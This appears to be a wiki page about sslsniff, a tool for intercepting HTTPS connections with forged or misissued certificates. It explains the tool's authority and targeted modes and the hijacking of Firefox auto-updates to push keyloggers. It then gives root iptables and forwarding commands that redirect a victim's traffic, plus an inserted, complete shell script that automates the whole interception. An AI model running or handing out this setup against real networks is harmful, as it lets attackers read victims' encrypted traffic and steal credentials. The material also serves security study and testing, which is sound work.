From charlesreid1

A tool from Moxie Marlinspike.

Also see SSLStrip.

Github repo: https://github.com/moxie0/sslsniff

Overview

sslsniff differs from sslstrip. sslstrip downgrades HTTPS requests to plain HTTP, forcing the sheep through an insecure connection; the victim never sees a certificate at all. sslsniff keeps the connection encrypted but terminates it itself, presenting the client with a certificate it controls. It is a tool about certificates and about the ways clients fail to validate them.

sslsniff has two modes: authority mode, and targeted mode. In addition, it implements several attacks on Firefox auto-updates.

In authority mode, sslsniff acts as a certificate authority: for each host the client connects to, it generates a leaf certificate for that name on the fly and signs it with the CA certificate and key you supply (or with a self-signed, auto-generated one). On its own this won't get you very far, since clients won't trust a CA they have never heard of. The mode becomes useful when the "CA" isn't really one: a client that fails to check the BasicConstraints extension will accept any certificate as a signer, so an ordinary leaf certificate issued to you by a real CA can be used in place of a CA certificate, and the chain it signs will validate on that client.

In targeted mode, sslsniff serves particular, pre-existing certificates for particular domains or sets of domains, rather than generating them. This is intended for use when you hold certificates that will only validate for certain names.

By taking over the Firefox auto-update process, you can push arbitrary binary blobs into the browser: keyloggers, certificate bundles, and so on.

In Plain English

There is no off-the-shelf attack that just automatically strips out SSL; modern sites and modern browsers are hip to that jive. You'll need to obtain a trusted certificate (ain't gonna happen) or make your own and find a client that will accept it. This tool lets you explore the world of certificates, certificate authorities, and the many ways of tricking browsers into trusting and accepting your certificates.

Getting Help

Running sslsniff with no arguments prints its usage text. Note that -h is not a help flag here: sslsniff uses -h <httpPort> for the HTTP interception port used in fingerprinting, so read the usage output rather than passing -h.

sslsniff

Important Flags

Important flags:

  • -a/-t - authority vs targeted mode

Required options:

  • -c - file containing the CA certificate and its private key (authority mode), or a directory holding a collection of certificates and keys (targeted mode)
  • -s port - port to listen on for ssl interception
  • -w file - file to log output to

Running

Prepare Firewall

A note on ports

sslsniff uses one port, optionally two. The two must be different ports.

One port is dedicated to SSL sniffing. All HTTPS (port 443) traffic is redirected here with iptables. This can be, e.g., port 6666.

An optional second port receives redirected HTTP (port 80) traffic. sslsniff only needs it for client/OS fingerprinting. This can be, e.g., port 6667.

Running with MITM

These rules assume the victim's traffic already passes through this host (e.g. after ARP spoofing, which is not covered here), and they must be run as root.

Tell your machine to forward packets:

echo 1 > /proc/sys/net/ipv4/ip_forward

Flush existing rules. Note that -F alone only flushes the filter table; the redirect rules below live in the nat table, so flush that as well with -t nat -F:

iptables -F

Add a rule to intercept HTTPS traffic and redirect it to sslsniff's SSL port:

iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports <$listenPort>

If you're going to do client fingerprinting, add a rule to redirect HTTP traffic to sslsniff's HTTP port (a different port from the SSL one):

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports <$httpListenPort>

Running in Authority Mode

To run in authority mode (the -c file must hold both the CA certificate and its private key):

sslsniff -a -s <$listenPort> -w <$logFile> -c <$caCert>
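The whole procedure above (packet forwarding, the nat redirect rules, and launching sslsniff in authority mode) gathered into one script, as an added example; this is not code from the sslsniff project or from the original page. The port numbers 6666 and 6667 are the ones this page uses; CA_FILE and LOG_FILE are placeholder paths you must supply; the -h <httpPort> option is taken from sslsniff's own usage output and is not listed on this page. The redirect rules are produced by a function rather than typed inline so that the port validation and the rule text can be checked without root, and a teardown removes the redirects so the victim's traffic is not black-holed once sslsniff exits.

```shell
#!/bin/sh
# Added example (not sslsniff's code): wrap the page's MITM setup in one script.
# Ports are the page's examples; paths are placeholders.
set -eu

SSL_PORT="${SSL_PORT:-6666}"           # HTTPS is redirected here (sslsniff -s)
HTTP_PORT="${HTTP_PORT:-6667}"         # HTTP redirected here for fingerprinting (-h); empty disables
LOG_FILE="${LOG_FILE:-/tmp/sslsniff.log}"   # placeholder
CA_FILE="${CA_FILE:-/root/ca.pem}"     # placeholder: PEM holding the CA cert AND its key

# Accept only a sane TCP port so a typo never reaches iptables.
valid_port() {
  case "$1" in ''|*[!0-9]*) return 1 ;; esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Authority mode needs the CA certificate and its private key in one PEM file;
# a cert-only file is a common reason for sslsniff failing to start.
check_ca_pem() {
  [ -r "$1" ] || return 1
  grep -q 'BEGIN CERTIFICATE' "$1" || return 1
  grep -q 'BEGIN .*PRIVATE KEY' "$1" || return 1
}

# Print the nat-table rules for the given ports, one per line. The HTTP rule
# is only emitted when an HTTP port is given.
redirect_rules() {
  ssl=$1; http=${2:-}
  valid_port "$ssl" || { echo "bad SSL port: $ssl" >&2; return 1; }
  printf 'iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports %s\n' "$ssl"
  if [ -n "$http" ]; then
    valid_port "$http" || { echo "bad HTTP port: $http" >&2; return 1; }
    printf 'iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports %s\n' "$http"
  fi
}

# Enable forwarding, clear the nat table (plain iptables -F only clears filter),
# install the redirects, then run sslsniff in authority mode. Needs root.
apply_mitm() {
  check_ca_pem "$CA_FILE" || { echo "$CA_FILE must hold the CA cert and key" >&2; return 1; }
  echo 1 > /proc/sys/net/ipv4/ip_forward
  iptables -t nat -F
  redirect_rules "$SSL_PORT" "$HTTP_PORT" | sh -e
  if [ -n "$HTTP_PORT" ]; then
    sslsniff -a -s "$SSL_PORT" -h "$HTTP_PORT" -w "$LOG_FILE" -c "$CA_FILE"
  else
    sslsniff -a -s "$SSL_PORT" -w "$LOG_FILE" -c "$CA_FILE"
  fi
}

# Remove the redirects and stop forwarding once sslsniff is gone.
teardown() {
  iptables -t nat -F
  echo 0 > /proc/sys/net/ipv4/ip_forward
}

case "${1:-}" in
  apply)    trap teardown EXIT; apply_mitm ;;
  teardown) teardown ;;
  rules)    redirect_rules "$SSL_PORT" "$HTTP_PORT" ;;
  *)        echo "usage: $0 apply|teardown|rules" >&2 ;;
esac
```

Run `./mitm.sh rules` first to see exactly which iptables lines will be applied, then `./mitm.sh apply` as root; the EXIT trap flushes the nat table when sslsniff terminates, which matters because a leftover REDIRECT to a port nobody listens on silently breaks the victim's browsing.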

Running In Targeted Mode

To run sslsniff in targeted mode, pass the -t flag and point -c at the directory of certificates. sslsniff does not ship certificates targeted at specific domains; what its certs directory does contain is a null-prefix "universal wildcard" certificate example, which only works against clients that still have the null-prefix hostname bug (fixed in mainstream browsers in 2009). Those null-prefix certificates were issued under the ipsCA intermediate IPSCACLASEA1.crt, so supply that intermediate chain with -m so the client sees a complete chain:

sslsniff -t -s <$listenPort> -w <$logFile> -m IPSCACLASEA1.crt -c <$certDir>

Example Certs

Wildcard cert: https://github.com/moxie0/sslsniff/blob/master/certs/wildcard

Flags